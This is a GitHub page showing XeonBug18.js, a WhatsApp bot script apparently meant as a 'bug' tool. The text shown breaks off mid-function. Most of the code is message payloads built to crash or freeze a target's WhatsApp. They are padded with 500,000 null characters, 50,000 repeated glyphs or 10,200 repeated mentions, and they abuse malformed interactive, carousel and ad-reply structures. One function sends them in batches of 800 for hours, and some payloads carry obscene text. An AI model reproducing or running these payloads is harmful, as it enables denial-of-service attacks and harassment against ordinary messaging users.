-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathXeonBug18.js
More file actions
4107 lines (3822 loc) · 143 KB
/
XeonBug18.js
File metadata and controls
4107 lines (3822 loc) · 143 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
//base by DGXeon (Xeon Bot Inc.)
//re-upload? recode? copy code? give credit ya :)
//YouTube: @DGXeon
//Instagram: unicorn_xeon13
//Telegram: @DGXeon
//GitHub: @DGXeon
//WhatsApp: +916909137213
//want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@DGXeon
//telegram channel: https://t.me/+WEsVdEN2B9w4ZjA9
process.on('uncaughtException', console.error)
require("./config")
const { generateMessageIDV2, WA_DEFAULT_EPHEMERAL, getAggregateVotesInPollMessage, generateWAMessageFromContent, proto, generateWAMessageContent, generateWAMessage, prepareWAMessageMedia, downloadContentFromMessage, areJidsSameUser, getContentType, useMultiFileAuthState, makeWASocket, fetchLatestBaileysVersion, makeCacheableSignalKeyStore, makeWaSocket } = require("@adiwajshing/baileys")
const fs = require('fs')
const util = require('util')
const axios = require('axios')
const { exec } = require("child_process")
const chalk = require('chalk')
const moment = require('moment-timezone');
const yts = require ('yt-search');
const didyoumean = require('didyoumean');
const similarity = require('similarity')
const pino = require('pino')
const logger = pino({ level: 'debug' });
const JSConfuser = require("js-confuser");
const crypto = require('crypto');
const path = require('path')
//const express = require('express');
const ms = require('ms');
const os = require('os')
/*const app = express();
const PORT = process.env.PORT || 3000;*/
module.exports = async (XeonBotInc, m) => {
try {
const from = m.key.remoteJid
var body = (m.mtype === 'interactiveResponseMessage') ? JSON.parse(m.message.interactiveResponseMessage.nativeFlowResponseMessage.paramsJson).id : (m.mtype === 'conversation') ? m.message.conversation : (m.mtype == 'imageMessage') ? m.message.imageMessage.caption : (m.mtype == 'videoMessage') ? m.message.videoMessage.caption : (m.mtype == 'extendedTextMessage') ? m.message.extendedTextMessage.text : (m.mtype == 'buttonsResponseMessage') ? m.message.buttonsResponseMessage.selectedButtonId : (m.mtype == 'listResponseMessage') ? m.message.listResponseMessage.singleSelectReply.selectedRowId : (m.mtype == 'templateButtonReplyMessage') ? m.message.templateButtonReplyMessage.selectedId : (m.mtype == 'messageContextInfo') ? (m.message.buttonsResponseMessage?.selectedButtonId || m.message.listResponseMessage?.singleSelectReply.selectedRowId || m.text) : ""
const { smsg, fetchJson, getBuffer, fetchBuffer, getGroupAdmins, TelegraPh, isUrl, hitungmundur, sleep, clockString, checkBandwidth, runtime, tanggal, getRandom } = require('./lib2/myfunc')
var budy = (typeof m.text == 'string' ? m.text: '')
var prefix = global.prefa ? /^[°•π÷×¶∆£¢€¥®™+✓_=|~!?@#$%^&.©^]/gi.test(body) ? body.match(/^[°•π÷×¶∆£¢€¥®™+✓_=|~!?@#$%^&.©^]/gi)[0] : "" : global.prefa ?? global.prefix
const isCmd = body.startsWith(prefix);
const command = isCmd ? body.slice(prefix.length).trim().split(' ').shift().toLowerCase() : '';
const args = body.trim().split(/ +/).slice(1)
const text = q = args.join(" ")
const sender = m.key.fromMe ? (XeonBotInc.user.id.split(':')[0]+'@s.whatsapp.net' || XeonBotInc.user.id) : (m.key.participant || m.key.remoteJid)
const botNumber = await XeonBotInc.decodeJid(XeonBotInc.user.id)
const senderNumber = sender.split('@')[0]
const isCreator = (m && m.sender && [botNumber, ...(global.db.data.owners || [])].map(v => v.replace(/[^0-9]/g, '') + '@s.whatsapp.net').includes(m.sender)) || false;
const isDeveloper = (m && m.sender && (global.db.data.owners || []).map(v => v.replace(/[^0-9]/g, '') + '@s.whatsapp.net').includes(m.sender)) || false;
const pushname = m.pushName || `${senderNumber}`
const isBot = botNumber.includes(senderNumber)
const quoted = m.quoted ? m.quoted : m
const mime = (quoted.msg || quoted).mimetype || ''
const qmsg = (quoted.msg || quoted)
const groupMetadata = m.isGroup ? await XeonBotInc.groupMetadata(from).catch(e => {}) : ''
const groupName = m.isGroup ? groupMetadata.subject : ''
const participants = m.isGroup ? await groupMetadata.participants : ''
const groupAdmins = m.isGroup ? await getGroupAdmins(participants) : ''
const isBotAdmins = m.isGroup ? groupAdmins.includes(botNumber) : false
const isAdmins = m.isGroup ? groupAdmins.includes(m.sender) : false
const isReact = m.message.reactionMessage ? true : false
//===============[DATABASE]=====================\\
try {
let isNumber = x => typeof x === 'number' && !isNaN(x)
let user = global.db.data.users[m.sender]
if (typeof user !== 'object') global.db.data.users[m.sender] = {}
if (user) {
if (!isNumber(user.premiumExpiry)) user.premiumExpiry = 0
} else global.db.data.users[m.sender] = {
premiumExpiry: 0
}
let setting = global.db.data.settings[botNumber]
if (typeof setting !== 'object') global.db.data.settings[botNumber] = {}
if (setting) {
if (!('antiswview' in setting)) setting.antiswview = false
} else global.db.data.settings[botNumber] = {
antiswview: false,
}
} catch (e) {
console.log(e)
}
//=====\\
const cd = require('./lib2/countdown')
let usersdb = global.db.data.users
fs.writeFileSync('./database/database.json', JSON.stringify(global.db, null, 2))
const isPremium = isCreator ? true : cd.isPremium(usersdb, m.sender)
const isRentBotUser = isDeveloper ? true : cd.isPremium(usersdb, m.sender)
//====================================\\
//bug
xeontex = "\n " + (args.join(" ") ? args.join(" ") : "Telegram: @Am_itachiuchiha") + "\n\n\n";
jidds = [];
xeontex += "*~@916909137213~*\n*🦄*\n*~@919366316018~*\n".repeat(10200);
jidds.push("916909137213@s.whatsapp.net", "919366316018@s.whatsapp.net");
//bug database
const { xeontext1 } = require('./69/xeontext1')
const { xeontext2 } = require('./69/xeontext2')
const { xeontext3 } = require('./69/xeontext3')
const { xeontext4 } = require('./69/xeontext4')
const { xeontext5 } = require('./69/xeontext5')
const { xeontext6 } = require('./69/xeontext6')
const { xeontext7 } = require('./69/xeontext7')
const { xeontext8 } = require('./69/xeontext8')
const { xeontext9 } = require('./69/xeontext9')
const { xeontext10 } = require('./69/xeontext10')
const { xeontext11 } = require('./69/xeontext11')
const { xeonbeta1, xeonbeta2, xeonyx } = require("./69/xeontext13.js")
const wkwk = fs.readFileSync(`./69/x.mp3`)
const xsteek = fs.readFileSync(`./69/x.webp`)
const o = fs.readFileSync(`./69/o.jpg`)
// No Need to Do Anything If You Don't Want Errors
//time
const xtime = moment.tz('Asia/Kolkata').format('HH:mm:ss')
const xdate = moment.tz('Asia/Kolkata').format('DD/MM/YYYY')
const time2 = moment().tz('Asia/Kolkata').format('HH:mm:ss')
if(time2 < "23:59:00"){
var xeonytimewisher = `Good Night 🌌`
}
if(time2 < "19:00:00"){
var xeonytimewisher = `Good Evening 🌃`
}
if(time2 < "18:00:00"){
var xeonytimewisher = `Good Evening 🌃`
}
if(time2 < "15:00:00"){
var xeonytimewisher = `Good Afternoon 🌅`
}
if(time2 < "11:00:00"){
var xeonytimewisher = `Good Morning 🌄`
}
if(time2 < "05:00:00"){
var xeonytimewisher = `Good Morning 🌄`
}
function sendMessageWithMentions2(text, mentions = [], quoted = false) {
if (quoted == null || quoted == undefined || quoted == false) {
return XeonBotInc.sendMessage(m.chat, {
'text': text,
'mentions': mentions
}, {
'quoted': m
});
} else {
return XeonBotInc.sendMessage(m.chat, {
'text': text,
'mentions': mentions
}, {
'quoted': m
});
}
}
function sendMessageWithMentions(text, mentions = [], quoted = false) {
if (quoted == null || quoted == undefined || quoted == false) {
return XeonBotInc.sendMessage(m.chat, {
text: text,
contextInfo: {
forwardingScore: 999,
isForwarded: true,
mentionedJid: [mentions],
forwardedNewsletterMessageInfo: {
newsletterName: ownername,
newsletterJid: "120363222395675670@newsletter",
},
externalAdReply: {
showAdAttribution: true,
title: ownername,
body: botname,
thumbnailUrl: "https://i.ibb.co/ydRKHnw/thumb.jpg",
sourceUrl: link,
mediaType: 1,
renderLargerThumbnail: false
}
}
}, {quoted:m})
} else {
return XeonBotInc.sendMessage(m.chat, {
text: text,
contextInfo: {
forwardingScore: 999,
isForwarded: true,
mentionedJid: [mentions],
forwardedNewsletterMessageInfo: {
newsletterName: ownername,
newsletterJid: "120363222395675670@newsletter",
},
externalAdReply: {
showAdAttribution: true,
title: ownername,
body: botname,
thumbnailUrl: "https://i.ibb.co/ydRKHnw/thumb.jpg",
sourceUrl: link,
mediaType: 1,
renderLargerThumbnail: false
}
}
}, {quoted:m})
}
}
const pickRandom = (arr) => {
return arr[Math.floor(Math.random() * arr.length)]
}
//group chat msg by xeon
const replygcxeon = (teks) => {
XeonBotInc.sendMessage(m.chat, {
text: teks,
contextInfo: {
forwardingScore: 999,
isForwarded: true,
mentionedJid: [sender],
forwardedNewsletterMessageInfo: {
newsletterName: ownername,
newsletterJid: "120363222395675670@newsletter",
},
externalAdReply: {
showAdAttribution: true,
title: ownername,
body: botname,
thumbnailUrl: "https://i.ibb.co/ydRKHnw/thumb.jpg",
sourceUrl: link,
mediaType: 1,
renderLargerThumbnail: false
}
}
}, {quoted:m})
}
//self public
if (!XeonBotInc.public) {
if (!isCreator) return
}
if (prefix && command) {
let caseNames = getCaseNames();
function getCaseNames() {
const fs = require('fs');
try {
const data = fs.readFileSync('XeonBug18.js', 'utf8');
const casePattern = /case\s+'([^']+)'/g;
const matches = data.match(casePattern);
if (matches) {
const caseNames = matches.map(match => match.replace(/case\s+'([^']+)'/, '$1'));
return caseNames;
} else {
return [];
} } catch (err) {
console.log('There is an error:', err);
return [];
}}
let noPrefix = command
let mean = didyoumean(noPrefix, caseNames);
let sim = similarity(noPrefix, mean);
let similarityPercentage = parseInt(sim * 100);
if (mean && noPrefix.toLowerCase() !== mean.toLowerCase()) {
let response = `Sorry, the command you gave is wrong. Maybe this is what you mean:\n\n•> ${prefix+mean}\n•> Similarities: ${similarityPercentage}%`
replygcxeon(response)
}}
//==============================================================\\
async function InVisibleX(X, show) {
let msg = await generateWAMessageFromContent(X, {
buttonsMessage: {
text: "Telegram: @DGXeon13",
contentText:
"Telegram: @DGXeon13",
footerText: "Telegram: @DGXeon13",
buttons: [
{
buttonId: ".aboutb",
buttonText: {
displayText: "Telegram: @DGXeon13" + "\u0000".repeat(500000),
},
type: 1,
},
],
headerType: 1,
},
}, {});
await XeonBotInc.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [X],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: X },
content: undefined,
},
],
},
],
},
],
});
if (show) {
await XeonBotInc.relayMessage(
X,
{
groupStatusMentionMessage: {
message: {
protocolMessage: {
key: msg.key,
type: 25,
},
},
},
},
{
additionalNodes: [
{
tag: "meta",
attrs: {
is_status_mention: "Telegram: @DGXeon13",
},
content: undefined,
},
],
}
);
}
}
async function sendMessagesForDurationX(durationHours, X) {
const totalDurationMs = durationHours * 60 * 60 * 1000; // Convert hours to milliseconds
const startTime = Date.now();
let count = 0;
const sendNext = async () => {
if (Date.now() - startTime >= totalDurationMs) {
console.log("Delivery Completed Within Specified Duration.");
return;
}
if (count < 800) {
await InVisibleX(X, false); // Using X from user input
count++;
await sendNext(); // Continue shipping
} else {
console.log(chalk.green(`Completed Sending 800 Packages To ${X}`)); // Log completed sending 800 packages
count = 0; // Reset for next package
console.log(chalk.red("Preparing To Ship The Next 800 Packages..."));
setTimeout(sendNext, 5000); // Pause 5 seconds after completion of batch of 800 messages
}
};
sendNext();
};
async function sendMessagesForDuration(durationHours, X) {
const totalDurationMs = durationHours * 60 * 60 * 1000; // Convert hours to milliseconds
const startTime = Date.now();
let count = 0;
const sendNext = async () => {
if (Date.now() - startTime >= totalDurationMs) {
console.log("Delivery Completed Within Specified Duration.");
return;
}
if (count < 800) {
await DelayInVis(X, false); // Using X from user input
count++;
await sendNext(); // Continue delivery without delay between messages
} else {
console.log(chalk.green(`Completed Sending 800 Packages To ${X}`)); // Log selesai kirim 800 paket
count = 0; // Reset for next package
console.log(chalk.red("Preparing To Ship The Next 800 Packages..."));
setTimeout(sendNext, 5000); // Pause 5 seconds after completion of batch of 800 messages
}
};
sendNext();
};
async function DelayInVis(X, show) {
let push = [];
push.push({
body: proto.Message.InteractiveMessage.Body.fromObject({ text: " " }),
footer: proto.Message.InteractiveMessage.Footer.fromObject({ text: " " }),
header: proto.Message.InteractiveMessage.Header.fromObject({
title: " ",
hasMediaAttachment: true,
imageMessage: {
url: "https://mmg.whatsapp.net/v/t62.7118-24/13168261_1302646577450564_6694677891444980170_n.enc?ccb=11-4&oh=01_Q5AaIBdx7o1VoLogYv3TWF7PqcURnMfYq3Nx-Ltv9ro2uB9-&oe=67B459C4&_nc_sid=5e03e0&mms3=true",
mimetype: "image/jpeg",
fileSha256: "88J5mAdmZ39jShlm5NiKxwiGLLSAhOy0gIVuesjhPmA=",
fileLength: "18352",
height: 720,
width: 1280,
mediaKey: "Te7iaa4gLCq40DVhoZmrIqsjD+tCd2fWXFVl3FlzN8c=",
fileEncSha256: "w5CPjGwXN3i/ulzGuJ84qgHfJtBKsRfr2PtBCT0cKQQ=",
directPath: "/v/t62.7118-24/13168261_1302646577450564_6694677891444980170_n.enc?ccb=11-4&oh=01_Q5AaIBdx7o1VoLogYv3TWF7PqcURnMfYq3Nx-Ltv9ro2uB9-&oe=67B459C4&_nc_sid=5e03e0",
mediaKeyTimestamp: "1737281900",
jpegThumbnail: "/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEABsbGxscGx4hIR4qLSgtKj04MzM4PV1CR0JHQl2NWGdYWGdYjX2Xe3N7l33gsJycsOD/2c7Z//////////////8BGxsbGxwbHiEhHiotKC0qPTgzMzg9XUJHQkdCXY1YZ1hYZ1iNfZd7c3uXfeCwnJyw4P/Zztn////////////////CABEIACgASAMBIgACEQEDEQH/xAAsAAEBAQEBAAAAAAAAAAAAAAAAAwEEBgEBAQEAAAAAAAAAAAAAAAAAAAED/9oADAMBAAIQAxAAAADzY1gBowAACkx1RmUEAAAAAA//xAAfEAABAwQDAQAAAAAAAAAAAAARAAECAyAiMBIUITH/2gAIAQEAAT8A3Dw30+BydR68fpVV4u+JF5RTudv/xAAUEQEAAAAAAAAAAAAAAAAAAAAw/9oACAECAQE/AH//xAAWEQADAAAAAAAAAAAAAAAAAAARIDD/2gAIAQMBAT8Acw//2Q==",
scansSidecar: "hLyK402l00WUiEaHXRjYHo5S+Wx+KojJ6HFW9ofWeWn5BeUbwrbM1g==",
scanLengths: [3537, 10557, 1905, 2353],
midQualityFileSha256: "gRAggfGKo4fTOEYrQqSmr1fIGHC7K0vu0f9kR5d57eo=",
},
}),
nativeFlowMessage: proto.Message.InteractiveMessage.NativeFlowMessage.fromObject({ buttons: [] }),
});
let msg = await generateWAMessageFromContent(
X,
{
viewOnceMessage: {
message: {
messageContextInfo: {
deviceListMetadata: {},
deviceListMetadataVersion: 2,
},
interactiveMessage: proto.Message.InteractiveMessage.fromObject({
body: proto.Message.InteractiveMessage.Body.create({ text: " " }),
footer: proto.Message.InteractiveMessage.Footer.create({ text: "bijiku" }),
header: proto.Message.InteractiveMessage.Header.create({ hasMediaAttachment: false }),
carouselMessage: proto.Message.InteractiveMessage.CarouselMessage.fromObject({ cards: [...push] }),
}),
},
},
},
{}
);
await XeonBotInc.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [X],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: X },
content: undefined,
},
],
},
],
},
],
});
if (show) {
await XeonBotInc.relayMessage(
X,
{
groupStatusMentionMessage: {
message: {
protocolMessage: {
key: msg.key,
type: 25,
},
},
},
},
{
additionalNodes: [
{
tag: "meta",
attrs: { is_status_mention: "Telegram: @DGXeon13" },
content: undefined,
},
],
}
);
}
}
async function EpUi(X, ptcp = true) {
let msg = await generateWAMessageFromContent(X, {
viewOnceMessage: {
message: {
interactiveMessage: {
header: {
title: "Telegram: @DGXeon13",
hasMediaAttachment: false
},
body: {
text: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*" + "ꦾ".repeat(50000),
},
nativeFlowMessage: {
messageParamsJson: "",
buttons: [{
name: "cta_url",
buttonParamsJson: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*"
},
{
name: "call_permission_request",
buttonParamsJson: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*"
}
]
}
}
}
}
}, {});
await XeonBotInc.relayMessage(X, msg.message, ptcp ? {
participant: {
jid: X
}
} : {});
}
async function EpHemeral(X, ptcp = true) {
let msg = await generateWAMessageFromContent(X, {
viewOnceMessage: {
message: {
interactiveMessage: {
header: {
title: "Telegram: @DGXeon13",
hasMediaAttachment: false
},
body: {
text: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*"
},
nativeFlowMessage: {
messageParamsJson: "",
buttons: [{
name: "cta_url",
buttonParamsJson: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*"
},
{
name: "call_permission_request",
buttonParamsJson: "*我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹* *我有一个很大的鸡鸡,请吸吮它 😹*"
}
]
}
}
}
}
}, {});
await XeonBotInc.relayMessage(X, msg.message, ptcp ? {
participant: {
jid: X
}
} : {});
}
async function TxIos(X, Ptcp = false) {
await XeonBotInc.relayMessage(X, {
"extendedTextMessage": {
"text": "Telegram: @DGXeon13",
"contextInfo": {
"stanzaId": "1234567890ABCDEF",
"participant": "916909137213@s.whatsapp.net",
"quotedMessage": {
"callLogMesssage": {
"isVideo": true,
"callOutcome": "1",
"durationSecs": "0",
"callType": "REGULAR",
"participants": [{
"jid": "916909137213@s.whatsapp.net",
"callOutcome": "1"
}]
}
},
"remoteJid": X,
"conversionSource": "source_example",
"conversionData": "Y29udmVyc2lvbl9kYXRhX2V4YW1wbGU=",
"conversionDelaySeconds": 10,
"forwardingScore": 9999999,
"isForwarded": true,
"quotedAd": {
"advertiserName": "Example Advertiser",
"mediaType": "IMAGE",
"jpegThumbnail": "/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEABsbGxscGx4hIR4qLSgtKj04MzM4PV1CR0JHQl2NWGdYWGdYjX2Xe3N7l33gsJycsOD/2c7Z//////////////8BGxsbGxwbHiEhHiotKC0qPTgzMzg9XUJHQkdCXY1YZ1hYZ1iNfZd7c3uXfeCwnJyw4P/Zztn////////////////CABEIAEgASAMBIgACEQEDEQH/xAAwAAADAQEBAQAAAAAAAAAAAAAABAUDAgYBAQEBAQEBAAAAAAAAAAAAAAAAAQIDBP/aAAwDAQACEAMQAAAAa4i3TThoJ/bUg9JER9UvkBoneppljfO/1jmV8u1DJv7qRBknbLmfreNLpWwq8n0E40cRaT6LmdeLtl/WZWbiY3z470JejkBaRJHRiuE5vSAmkKoXK8gDgCz/xAAsEAACAgEEAgEBBwUAAAAAAAABAgADBAUREiETMVEjEBQVIjJBQjNhYnFy/9oACAEBAAE/AMvKVPEBKqUtZrSdiF6nJr1NTqdwPYnNMJNyI+s01sPoxNbx7CA6kRUouTdJl4LI5I+xBk37ZG+/FopaxBZxAMrJqXd/1N6WPhi087n9+hG0PGt7JMzdDekcqZp2bZjWiq2XAWBTMyk1XHrozTMepMPkwlDrzff0vYmMq3M2Q5/5n9WxWO/vqV7nczIflZWgM1DTktauxeiDLPyeKaoD0Za9lOCmw3JlbE1EH27Ccmro8aDuVZpZkRk4kTHf6W/77zjzLvv3ynZKjeMoJH9pnoXDgDsCZ1ngxOPwJTULaqHG42EIazIA9ddiDC/OSWlXOupw0Z7kbettj8GUuwXd/wBZHQlR2XaMu5M1q7pK5g61XTWlbpGzKWdLq37iXISNoyhhLscK/PYmU1ty3/kfmWOtSgb9x8pKUZyf9CO9udkfLNMbTKEH1VJMbFxcVfJW0+9+B1JQlZ+NIwmHqFWVeQY3JrwR6AmblcbwP47zJZWs5Kej6mh4g7vaM6noJuJdjIWVwJfcgy0rA6ZZd1bYP8jNIdDQ/FBzWam9tVSPWxDmPZk3oFcE7RfKpExtSyMVeCepgaibOfkKiXZVIUlbASB1KOFfLKttHL9ljUVuxsa9diZhtjUVl6zM3KsQIUsU7xr7W9uZyb5M/8QAGxEAAgMBAQEAAAAAAAAAAAAAAREAECBRMWH/2gAIAQIBAT8Ap/IuUPM8wVx5UMcJgr//xAAdEQEAAQQDAQAAAAAAAAAAAAABAAIQESEgMVFh/9oACAEDAQE/ALY+wqSDk40Op7BTMEOywVPXErAhuNMDMdW//9k=",
"caption": "This is an ad caption"
},
"placeholderKey": {
"remoteJid": "916909137213@s.whatsapp.net",
"fromMe": false,
"id": "ABCDEF1234567890"
},
"expiration": 86400,
"ephemeralSettingTimestamp": "1728090592378",
"ephemeralSharedSecret": "ZXBoZW1lcmFsX3NoYXJlZF9zZWNyZXRfZXhhbXBsZQ==",
"externalAdReply": {
"title": "Telegram: @DGXeon13",
"body": "Telegram: @DGXeon13",
"mediaType": "VIDEO",
"renderLargerThumbnail": true,
"previewTtpe": "VIDEO",
"thumbnail": "/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEABsbGxscGx4hIR4qLSgtKj04MzM4PV1CR0JHQl2NWGdYWGdYjX2Xe3N7l33gsJycsOD/2c7Z//////////////8BGxsbGxwbHiEhHiotKC0qPTgzMzg9XUJHQkdCXY1YZ1hYZ1iNfZd7c3uXfeCwnJyw4P/Zztn////////////////CABEIAEgASAMBIgACEQEDEQH/xAAwAAADAQEBAQAAAAAAAAAAAAAABAUDAgYBAQEBAQEBAAAAAAAAAAAAAAAAAQIDBP/aAAwDAQACEAMQAAAAa4i3TThoJ/bUg9JER9UvkBoneppljfO/1jmV8u1DJv7qRBknbLmfreNLpWwq8n0E40cRaT6LmdeLtl/WZWbiY3z470JejkBaRJHRiuE5vSAmkKoXK8gDgCz/xAAsEAACAgEEAgEBBwUAAAAAAAABAgADBAUREiETMVEjEBQVIjJBQjNhYnFy/9oACAEBAAE/AMvKVPEBKqUtZrSdiF6nJr1NTqdwPYnNMJNyI+s01sPoxNbx7CA6kRUouTdJl4LI5I+xBk37ZG+/FopaxBZxAMrJqXd/1N6WPhi087n9+hG0PGt7JMzdDekcqZp2bZjWiq2XAWBTMyk1XHrozTMepMPkwlDrzff0vYmMq3M2Q5/5n9WxWO/vqV7nczIflZWgM1DTktauxeiDLPyeKaoD0Za9lOCmw3JlbE1EH27Ccmro8aDuVZpZkRk4kTHf6W/77zjzLvv3ynZKjeMoJH9pnoXDgDsCZ1ngxOPwJTULaqHG42EIazIA9ddiDC/OSWlXOupw0Z7kbettj8GUuwXd/wBZHQlR2XaMu5M1q7p5g61XTWlbpGzKWdLq37iXISNoyhhLscK/PYmU1ty3/kfmWOtSgb9x8pKUZyf9CO9udkfLNMbTKEH1VJMbFxcVfJW0+9+B1JQlZ+NIwmHqFWVeQY3JrwR6AmblcbwP47zJZWs5Kej6mh4g7vaM6noJuJdjIWVwJfcgy0rA6ZZd1bYP8jNIdDQ/FBzWam9tVSPWxDmPZk3oFcE7RfKpExtSyMVeCepgaibOfkKiXZVIUlbASB1KOFfLKttHL9ljUVuxsa9diZhtjUVl6zM3KsQIUsU7xr7W9uZyb5M/8QAGxEAAgMBAQEAAAAAAAAAAAAAAREAECBRMWH/2gAIAQIBAT8Ap/IuUPM8wVx5UMcJgr//xAAdEQEAAQQDAQAAAAAAAAAAAAABAAIQESEgMVFh/9oACAEDAQE/ALY+wqSDk40Op7BTMEOywVPXErAhuNMDMdW//9k=",
"sourceType": " x ",
"sourceId": " x ",
"sourceUrl": "https://www.instagram.com/raditx7",
"mediaUrl": "https://www.instagram.com/raditx7",
"containsAutoReply": true,
"renderLargerThumbnail": true,
"showAdAttribution": true,
"ctwaClid": "ctwa_clid_example",
"ref": "ref_example"
},
"entryPointConversionSource": "entry_point_source_example",
"entryPointConversionApp": "entry_point_app_example",
"entryPointConversionDelaySeconds": 5,
"disappearingMode": {},
"actionLink": {
"url": "https://www.instagram.com/raditx7"
},
"groupSubject": "Example Group Subject",
"parentGroupJid": "6287888888888-1234567890@g.us",
"trustBannerType": "trust_banner_example",
"trustBannerAction": 1,
"isSampled": false,
"utm": {
"utmSource": "utm_source_example",
"utmCampaign": "utm_campaign_example"
},
"forwardedNewsletterMessageInfo": {
"newsletterJid": "916909137213-1234567890@g.us",
